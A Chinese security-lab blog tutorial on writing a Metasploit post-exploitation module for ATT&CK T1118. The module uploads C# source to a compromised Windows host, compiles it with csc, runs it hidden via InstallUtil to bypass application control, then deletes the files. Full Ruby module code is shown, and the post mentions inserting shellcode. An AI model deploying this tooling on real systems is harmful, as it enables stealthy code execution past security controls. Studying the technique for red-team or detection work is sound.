技术分享丨Metasploit后渗透模块编写ATT&CK-T1118

  XCTF联赛小秘       2020-09-04 14:31:47 671  0

赛宁网安天虞实验室,正式成立于2020年6月,是赛宁网安旗下以攻防技术研究为目标的安全团队,目前拥有20位专业的安全研究员,专注于渗透测试、安全开发、IOT安全、工控安全等方面。




一. T1118

攻击者可以使用InstallUtil通过受信任的Windows实用工具代理代码执行。InstallUtil是一个命令行实用程序,通过执行.NET二进制文件中指定的特定安装程序组件,允许安装和卸载资源。(引用:MSDN InstallUtil)InstallUtil由Microsoft数字签名,位于Windows系统上的.NET目录中:
C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe``C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe

通过在二进制文件中使用执行用属性装饰的类的属性,InstallUtil也可以用于绕过应用程序控制[System.ComponentModel.RunInstaller(true)]


一. T1118-POC

InstallUtil HelpText方法调用


第一步:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs

第二步:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll


HelpText 调用:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll




三. 开始编写模块

思路流程:
由于t1118属于后渗透阶段,我们为其在获取session会话的时候进行以下操作
1.上传源代码
2.csc编译dll
3.InstallUtil.exe调用加载dll

需要定义设置的参数:
1.本地C#源码
2.上传windows的路径
3.dotnet的版本

我们在/usr/share/metasploit-framework/modules/post/windows/和/usr/share/metasploit-framework/data/文件夹中新建一个文件夹本文命名为tianyu,在这个文件夹中用于存放关于att&ck相关的攻击模块。

然后新建一个ruby文件,为其命名为t1118.rb



1


初始化模块

参考官方编写模块 https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

定义初始化info信息


设置参数
        OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]),        OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs") ]),        OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]),        OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]),

定义使用run命令 执行的内容。
   def run        begin            return 0 if session.type != "meterpreter"            print_good("模块T1118执行成功")        rescue ::Exception => e            print_status("Unable to execute: #{e.message}")            print_error("模块T1118执行失败")            return        end    end

2


定义本地文件和上传文件

定义remote_file和local_file 对 datastore['RFILE']和 datastore['LFILE']取值
    def remote_file        if datastore['RFILE'].blank?          remote_name = File.basename(datastore['LFILE'])        else          remote_name = datastore['RFILE']        end
remote_name end
def local_file datastore['LFILE'] end

3


删除上传的源代码

    def clean_file          print_status("Removing files...")          register_file_for_cleanup(datastore['RFILE'])    end

4


定义CMD的命令

使用run_cmd 运行命令
    def run_cmd(user_cmd,io=true)        cmd = "cmd /c #{user_cmd}"        begin          print_status("Executing '#{cmd}' on #{session.inspect}")          if io            res = cmd_exec(cmd)            if res              print_warning(res)            end          else            res = session.sys.process.execute(cmd, nil, {'Hidden' => true})          end        rescue ::Exception => e          print_error("Unable to execute: #{e.message}")          return        end      end

5


上传文件和命令执行

该步骤为以下内容

1)上传本地的/usr/share/metasploit-framework/data/tianyu/t1118/t1118.cs文件到C:\windows\temp\t1118.tmp

2)使用csc.exe 对t1118.tmp 进行编译

3)使用InstallUtil对编译后的dll进行调用

4)删除源文件

    def run        begin            return 0 if session.type != "meterpreter"            rfile = remote_file()            lfile = local_file()            dotnet_version = datastore['DOTNET_VERSION']            base = 'C:\Windows\Microsoft.NET\Framework'
csc = base + '\\' + dotnet_version + '\\' + 'csc.exe' installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
upload_file(rfile, lfile)

cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile}) print_status("Compiling...") run_cmd(cmd)#C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs

sleep(2) cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll") #C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll

print_status("Executing InstallUtil...") run_cmd(cmd,false) print_good("模块T1118执行成功") sleep(2) clean_file() print_good("清理缓存成功") rescue ::Exception => e print_status("Unable to execute: #{e.message}") print_error("模块T1118执行失败") return end end

t1118整体加载模块初始设置



poc 运行后



poc 填入shellcode 运行后


demo演示


四. 完整代码


添加库路径/usr/share/metasploit-framework/lib/msf/core/post/windows.rb
require 'msf/core/post/windows/tianyu'

定义库文件/usr/share/metasploit-framework/lib/msf/core/post/windows/tianyu.rb
# -*- coding: binary -*-
module Msfclass Postmodule Windows
module Tianyu
#上传文件 def remote_file if datastore['RFILE'].blank? remote_name = File.basename(datastore['LFILE']) else remote_name = datastore['RFILE'] end
remote_name end
#本地文件 def local_file datastore['LFILE'] end
#清理文件 def clean_file print_status("Removing files...") register_file_for_cleanup(datastore['RFILE']) end
#运行cmd 命令 def run_cmd(user_cmd,io=true) cmd = "cmd /c #{user_cmd}" begin print_status("Executing '#{cmd}' on #{session.inspect}") if io res = cmd_exec(cmd) if res print_warning(res) end else res = session.sys.process.execute(cmd, nil, {'Hidden' => true}) end rescue ::Exception => e print_error("Unable to execute: #{e.message}") return end end
end # Tianyuend # Windowsend # Postend # Msf

模块文件 /usr/share/metasploit-framework/modules/post/windows/tianyu/t1118.rb
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##
class MetasploitModule < Msf::Post include Msf::Post::File include Exploit::FileDropper include Post::Windows::Tianyu def initialize(info={}) super(update_info(info, 'Name' => 'InstallUtil (T1118) Windows', 'Deion' => %q{ ATT&CK 模块编写 T1118 }, 'License' => MSF_LICENSE, 'Author' => [ '天虞实验室-demon' ], 'References' => [ [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ], [ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ], [ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260' ], [ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ] ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) register_options( [ OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]), OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs") ]), OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]), OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]), ]) end

def run begin return 0 if session.type != "meterpreter" rfile = remote_file() lfile = local_file() dotnet_version = datastore['DOTNET_VERSION'] base = 'C:\Windows\Microsoft.NET\Framework'
csc = base + '\\' + dotnet_version + '\\' + 'csc.exe' installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
upload_file(rfile, lfile) cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile}) print_status("Compiling...") run_cmd(cmd) sleep(2) cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll") print_status("Executing InstallUtil...") run_cmd(cmd,false) print_good("模块T1118执行成功") sleep(2) clean_file() print_good("清理缓存成功") rescue ::Exception => e print_status("Unable to execute: #{e.message}") print_error("模块T1118执行失败") return end endend

同样cobaltstrike也是一样的写法和思路
下面为我已编写好的脚本演示




参考链接:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md#atomic-test-7---installutil-helptext-method-call
https://attack.mitre.org/techniques/T1218/004/
https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb

请先登录
+1 已点过赞
0
分享到:
登录后才能发贴或参与互动哦! 点击登录

全部评论 (0)